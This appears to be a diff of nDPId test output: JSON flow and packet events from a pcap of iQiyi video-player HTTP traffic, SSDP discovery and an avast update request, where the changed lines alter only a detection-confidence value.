+01297{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1031,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353150114,"flow_last_seen":1467353150114,"flow_idle_time":7580000,"flow_min_l4_payload_len":893,"flow_max_l4_payload_len":893,"flow_tot_l4_payload_len":893,"flow_avg_l4_payload_len":893,"midstream":1,"thread_ts_msec":1467353150114,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50485,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:23:23|45&av=4.10.004&b=180932301&c=31&ct=5000000927558&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000858874&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353149045&sh=&sq=&sw=&t=mid&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1032,"source":"pps.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1467353150272,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353150272,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5A3BAADMGNsbKbA7swKhzCABQxTUn\/rQSUIG5k1AYACEwggAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjQ5IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1033,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353151975,"flow_last_seen":1467353151975,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1467353151975,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"77.234.40.96","src_port":50486,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1033,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1467353151975,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":231,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":231,"pkt_l4_len":197,"thread_ts_msec":1467353151975,"pkt":"TF4M6gNlABxCjnAxCABFAADZC01AAIAGRNfAqHMITeooYMU2AFCms6ewkbp6GVAYAQQ6hQAAUE9TVCAvYmMyIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3gtZW5jDQpVc2VyLUFnZW50OiB7RDY5OTA1NEQtMTY5OS00N0QyLTlCMkItRTk2RjQzOEMxMTYwfQ0KQ29udGVudC1MZW5ndGg6IDU2NzANCkhvc3Q6IGJjdS5mZi5hdmFzdC5jb20NCg0K"} -00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1033,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353151975,"flow_last_seen":1467353151975,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1467353151975,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"77.234.40.96","src_port":50486,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"HTTP.Cybersec","breed":"Safe","category":"Cybersecurity"},"http": {"hostname":"bcu.ff.avast.com","url":"bcu.ff.avast.com\/bc2","code":0,"content_type":"","user_agent":"{D699054D-1699-47D2-9B2B-E96F438C1160}"}} +00931{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1033,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353151975,"flow_last_seen":1467353151975,"flow_idle_time":7580000,"flow_min_l4_payload_len":177,"flow_max_l4_payload_len":177,"flow_tot_l4_payload_len":177,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1467353151975,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"77.234.40.96","src_port":50486,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"11": {"risk":"HTTP Suspicious User-Agent","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"HTTP.Cybersec","breed":"Safe","category":"Cybersecurity"},"http": {"hostname":"bcu.ff.avast.com","url":"bcu.ff.avast.com\/bc2","code":0,"content_type":"","user_agent":"{D699054D-1699-47D2-9B2B-E96F438C1160}"}} 02163{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1034,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1467353151975,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353151975,"pkt":"TF4M6gNlABxCjnAxCABFAAUUC05AAIAGQJvAqHMITeooYMU2AFCms6hhkbp6GVAQAQSchQAAfQmTpyjixsOwP21FM2w\/ULoWwCiRrGBztIvpkusTbkEbT7JRm749XrUdCj1kKEvBT\/wTVkKLufbjw1lE2fa\/UtfZqs8TT1sk5wEGF4kYfIBf8IaB+OB99fNQgj9Vf1WdVn6TWCfKWR8\/tOS1RKXEgVzfK9erxE3KK+nwydrin0EcycTdDVWiVtuMe6+NSVWZ\/hX990m9djhmhk3Y\/4CbzK44FcPuMMFEvf5FVV6Oh2IVmfsf\/HyiZyDsblCwMFxZeIENUdwKFZahHZX4t2m+0Z8nqx5GXJvlYlyBEV3d0wnwacDVs7VGlTeQSPCThjPgIK8C3+Vm\/SkQMbSbjQQCR56leCZ3zx0zWA16oy\/HwboJXydgKpLLIsIb296bgz9PD0n73r5JevLp9zMQqDnUQH7bGAIZpCoRWg6yOqztL9wx8O8w7fULoBoHntXDNfSIf8aFHnKtztY0xF\/96mqnymFN1wqAbHV11hLYYhYABZBRKOYh4GvMJKN2EaePTJX1g69akJ5Coj\/WAxsj0dEvDR\/vazeiKPax6X0XCpj5u6F0enF2pgEO1DTDpJi4uqvsm4AG7RZTr9WzwZ511fH70pdVZhvHAHeLJEQhK3oT2d6qVMypkVqz3M6P1FXtaWt6+1gJ1EA+POfXctGwSFaJ2WZGwODsWtngLfTDrHYAa++DuvVvAXrC2fFJrQkArXUNzp3jB4yvJRX9IfGTljC134RtjqrqbfWIsHFlGJEvMl6y8wFPjh0U9nAnPPQHSvBi4P8rwzQhP8lZJWbdcGMeiQgoqjzlwL1JkK4Z+B\/r9S3cXUR8rrHDij9ETvqsfuOaaaj2os8zFQDB8g7oYE5htEg8jLGOrgDB+UxAsTk63FA\/Jq1qLQHIt5T87bux2F3Z6\/NtrKJ6XYTsiyX+gxtG9H+42iLcG1kZ\/aUAi1jpTBvtNKfvz8CwqOqNqLU20IAIOBemooRjwRmnBDY3f6aUMeS+wFWlvE\/51CwA1+ifJ60PDvUC79ewXAaFTKMKjf0aaHbyL5CorfEgQAN7IeqBZ06UIaZ6vzz7AgQaAmx6+Ba5qOjoaqoz\/AZLRtOM5g9J99\/JqcSZWau6dqbzwSi9lHTkFpydYtcaUiasMFbnGv1qCDetlZciKtaHoyXbLcLDtNVUeS+HOrUzQyYK2h4whXgFAMDp8Qgu77GMRNBVQqzQrQHNXcQsTRb6ToCJRD0mhPHF56bxN+TcgS8+LJg2hXeTQJGeN4XVvZl+\/NwXCMoOTGaegW++r9Spf9MH6Q7pxuozLc8xjGZ4BotpQroHGQdbg1euShz6cj4v+w35bhHqsX2WqI17RldQkIoRivoqIWQBzpBtvyVToKzr4w1pfcU7KlWiZF6wXXPmeAndVoYy0RAdjUny0dy7q\/aodxD7\/IpKex\/VPNqhV606AtQnAV2BIj+BMksKx18fv+MTvBJVqBMbMlNv\/dfX4KuK9dxD\/j5nlJb1fFCWJ+mUJw+9FKSt1DG2gs0a3nU5wTbq1xdLsklg3Akuz9T9GOR2bt29bGI8qPpXY4FyhIeC9WH4\/TgMEDv9wfb4n6lndgz9I\/9vnUXWZxcDVa2twnV4LY8xc0KQum7e2YlcthsPm+N4Sl\/nQbs4298fPcsHdqZxtg1t+yz4aZA3Jpe+9\/ltbgGRFyN2OyRh7w7lbrWs"} 02155{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1035,"source":"pps.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1467353152282,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353152282,"pkt":"TF4M6gNlABxCjnAxCABFAAUUC5NAAIAGQFbAqHMITeooYMU2AFCms61Nkbp6GVAQAQTfHQAAbLkOCKU4wj\/evx8imwONGRNDCRNcxEbrXP8hhP5gS61xcdF\/9QCewJiAs88\/dsvrtuhb3rfKKfW889MM5i42wXGEV9fB6Oxnr9wNq+2BhBuurBIHxqXRfAAEoidfx5NjtSMkojiYfAgpgjXDepNqnYPmOEFYHjyOyZguAfDLSM7WCkcWflClhfDaN8J2wfLC\/MPix0DO7IQYMANuOzdnO3SsyyWTTBGHWAEilJLD4tHtNv5RXPXVzcDFv\/ZarQ8dpVXt06BE7M0zlIZna\/IAgdCvI6q5WBZEc\/DK1bc+szeRLHeTn9hb3LwIm5n4j6dH8WghVh4s\/faOqc4OH+pUVO\/YE9fpSsBUVYngldbrHRI5VyRGxL9aOSsPtS4AFeevGJhVzhN4cUWAnUrThdi80PfSu8tNoh7a5szE8bOfyFSl1J5U7dmSuzwsTd1O2VTTA6KkfW80J9853vrsBHj4FYhAgrfCc+AwKx842BJ5tAqCj0sllv5X87h05vAIn5jnPfuPTQZHDGSZF2ChAwxTMJDdvR6z9YqImCWEyGrlX5kVoRgmxMOXn9xgYST7BNbiKdlZJF63+s1OXqQANdKPZK9Tj+vw5aEt8npdIxi659XlE7GbPxGSGQAHioYprIcBMeXfKSeoFXi6v3GiDBYEY44c+YWn+u5dOrxPQy5gu98V\/bpgMgXufFfUvDeO83MuZBryxxpxRtKyO19btTWCUF4PY4vFOsUlEu5wupC5QJDHjSI5JBPnNgSjAFFlHl+H48KJmALxOWkXAjw7wfJ7i0t\/VAJjqzl7KEymLhTMovEkDd8M5KH4L7bM1Pk5SNL44CnPTt0uJC5bu5Y0nC5WeJ5o8FAU+zDySeyFlAKIjVubfBhsfH6iYELuT6bM366CZ2JChIMXy77eZ2ogebEDmfXuAZrshdW456rcGFtnXh7J5hHvVDP3AMs6IVf8LUWSqi6N9+RmH\/KbTYzdQuJb03F7\/k5dx4g2yWo3fs+Lr5JRUf5t\/vLHgHitgjVHiyfZxFryJ2gxO3j2J3Cy8+3iOyUtI4v3PFchrsaNap7PQFpuFhS4kHaW1nfHocLobHPOFLIJLaEq2Z3VJqsMiOWSIoeotU+nrZScO9ejGxvSfkni9AXlOWPv1zuo9rLJelhCyIJrC4Xn+WkzpkY6zFTV6\/5UunGX0Tb8Vczy7McXvGLjkrbiGj3QMStuCAUNlJpEVT8k65UrM5LwbEH4KAV5kUEs1eVMQu3tNilgdCCEWCCXyXIXhc7F8aNPdAP\/PS1DvzRFz2xUmcIICmQZ5HsVmrPOAorHnvum6saL0SZ4Xpsb2NtRcCkYo5ulH5R5LBdjwVak1WRQmaIpJTSuFDlTHmcUlO91XLgWqht8m4JPcT8KVxMhaep7\/D8rK0OPB4\/bZz3AmwRRkEn1w2WxcrplYcrA9llu+UUdElcjgIQb+8Ut3dZ78QhR6hg0LSfopHZZKMjm7H8PGYnnckV7+UPzMYjSuw2xH6Scc5NP4qyN1pRNyJqbAsYjU9DQoRSV4QpLKW1o4cygA24ZnSsb0t8q6Ugh54j1Rk4AcTFxkKhm0GqVFfy3vqOZrj5LFm1yDiouv3X+Ev+I8njUSG1\/7yVhpxE8Ojwp45UwRLFQxvD31ZdmkgP4Weywok7EK11JBAomj+s4\/jGCJXIASa\/M"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1041,"source":"pps.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353152692,"flow_last_seen":1467353152692,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353152692,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":59648,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1041,"source":"pps.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1467353152692,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353152692,"pkt":"AQBef\/\/6GF4PUugBCABFAAChLGwAAAER1wTAqAU57\/\/\/+ukAB2wAjbKhTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} -00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1041,"source":"pps.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353152692,"flow_last_seen":1467353152692,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353152692,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":59648,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} +00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1041,"source":"pps.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353152692,"flow_last_seen":1467353152692,"flow_idle_time":200000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353152692,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":59648,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1044,"source":"pps.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1467353155693,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353155693,"pkt":"AQBef\/\/6GF4PUugBCABFAAChLG0AAAER1wPAqAU57\/\/\/+ukAB2wAjbKhTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1045,"source":"pps.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353155790,"flow_last_seen":1467353155790,"flow_idle_time":7580000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1467353155790,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50487,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01291{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1045,"source":"pps.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1467353155790,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":683,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":683,"pkt_l4_len":649,"thread_ts_msec":1467353155790,"pkt":"TF4M6gNlABxCjnAxCABFAAKdDjtAAIAG3SfAqHMIymwO28U3AFCNS81scTxdzlAYAQSLywAAR0VUIC9jb3JlP3Q9MiZjaGlwaWQ9SW50ZWwlMjhSJTI5JTIwQ29yZSUyOFRNJTI5JTIwaTUlMkQyNTU3TSUyMENQVSUyMCU0MCUyMDElMkU3MEdIeiZ0bT0xNSZyYT0xJmlzaGNkbj0yJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9NiZyPTUwMDQ5NDYwMCZhaWQ9NTAyOTU5OTAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPXdpbmRvd3Mmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxNTUmaXNsb2NhbD0wJmFzPWQxOWY2NDA0N2I2NDFjZDZmZjA5NmIwNGZiMmEzMGI1JnZlPTNjYzBjOGZhMzcyNjI1ZTY0MTQzMTQ0ODE2ZjNlOTY4JnBlPWM5NWQ5OTJlMjk4NTZkYzg0ZjJlOTkwN2EyZTRiMjgyJnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} -01209{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1045,"source":"pps.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353155790,"flow_last_seen":1467353155790,"flow_idle_time":7580000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1467353155790,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50487,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=2&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&tm=15&ra=1&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353155&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +01209{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1045,"source":"pps.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353155790,"flow_last_seen":1467353155790,"flow_idle_time":7580000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1467353155790,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50487,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=2&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&tm=15&ra=1&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353155&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1046,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353156641,"flow_last_seen":1467353156641,"flow_idle_time":7580000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1467353156641,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50488,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00795{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1046,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1467353156641,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":311,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":311,"pkt_l4_len":277,"thread_ts_msec":1467353156641,"pkt":"TF4M6gNlABxCjnAxCABFAAEpDsFAAIAGbi7AqHMI3xpqFMU4AFDYI3WbArNbVVAYAQSIDAAAR0VUIC8yMDE2MDYyNS9hNS9iZi80MTNmOTFhZDEwMWU3ODBhNmI2M2Y4MjZlMjhiOTkyMC54bWwgSFRUUC8xLjENClVzZXItQWdlbnQ6IFFZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1ldGEudmlkZW8ucWl5aS5jb20NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOjUwMDQ5NDYwMF8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} -00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1046,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353156641,"flow_last_seen":1467353156641,"flow_idle_time":7580000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1467353156641,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50488,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"meta.video.qiyi.com","url":"meta.video.qiyi.com\/20160625\/a5\/bf\/413f91ad101e780a6b63f826e28b9920.xml","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1046,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353156641,"flow_last_seen":1467353156641,"flow_idle_time":7580000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1467353156641,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50488,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"meta.video.qiyi.com","url":"meta.video.qiyi.com\/20160625\/a5\/bf\/413f91ad101e780a6b63f826e28b9920.xml","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 02155{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1047,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1467353156699,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353156699,"pkt":"ABxCjnAxTF4M6gNlCABFAAUU\/f1AADgGwwbfGmoUwKhzCABQxTgCs1tV2CN2nFAQAB+1jgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNTo1NiBHTVQNCkNvbnRlbnQtVHlwZTogdGV4dC94bWwNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpMYXN0LU1vZGlmaWVkOiBTYXQsIDI1IEp1biAyMDE2IDA2OjA4OjM2IEdNVA0KRXhwaXJlczogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjo1MCBHTVQNCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MzAwDQpYLUNhY2hlOiBmcm9tIDEwLjEyMS4zNC4xNDANCkNvbnRlbnQtRW5jb2Rpbmc6IGd6aXANClgtQ2FjaGU6IEhJVCBmcm9tIDEwLjEyMS4zMy45OA0KWC1DYWNoZTogRVhQSVJFRCBmcm9tIDIyMy4yNi4xMDYuMjANCg0KNWZlDQofiwgAAAAAAAADhZnrbhs5DIX\/9ykCP8BEFC+SAHf6KIuxM26NzaWtnezl6fewDtIUXdIpUNvjY4n6SJHizPbT3w\/3Ny\/r99Px6fHjhqayufk0f9gejvfraT3PH262h\/uXm8flYf24KTtalr7wbmfrfuyoDO1dZLfXhdbdbj9BusFPbrZf1uPnL+eZrWxvX9\/75b+Od+cvswmuXt76xfPxYT2dl4ev+6fH8\/Hx+en5NNP29v8uu\/yHZcd\/17kXbaXK9vbtin999\/x9OWMtM2mf2Nr29u2Kf\/1yvFuf\/jgvn+cyCv64+v8\/\/6i9vSfYWehwOKyE1ztrl8\/LXq1KWUo9HIYZXv1fv\/yMS7m8oyGt76nv1QfBl2p97WM51P1FWfhue\/vTGrdteb47vtp2GeSHha9yvCwHDMUDQ626qFw0uE5g8PO3PtKf6z+H73DZaf32vD7u15M75d3lHx9fyV\/eg8xy\/7zeHO\/g5s1cJowL+\/za7wK6JqibmaZR4xF4M3MqkM2sqUA3c0sFtpnHBEbhKhqMpAmeCxUdCk4VAwpNFQSa1HIJeNLIJSBac2MJTGtuLYFqvWIuuFabWuI7AtnacwnYcsklgMs1l4AuSyqpoMu5uRV0OTe3gq7k5lbQldzcCroikyUBVUFXLJeAriCyPXMG26+CroxJEx9V0NUyWRL+FXS1pqMw6KrkEtBVyyWgi1ycmcugayWXgK5RuiIGXeOpeHkJ0DHomkxI+rEEdM1yCehazyWga2OS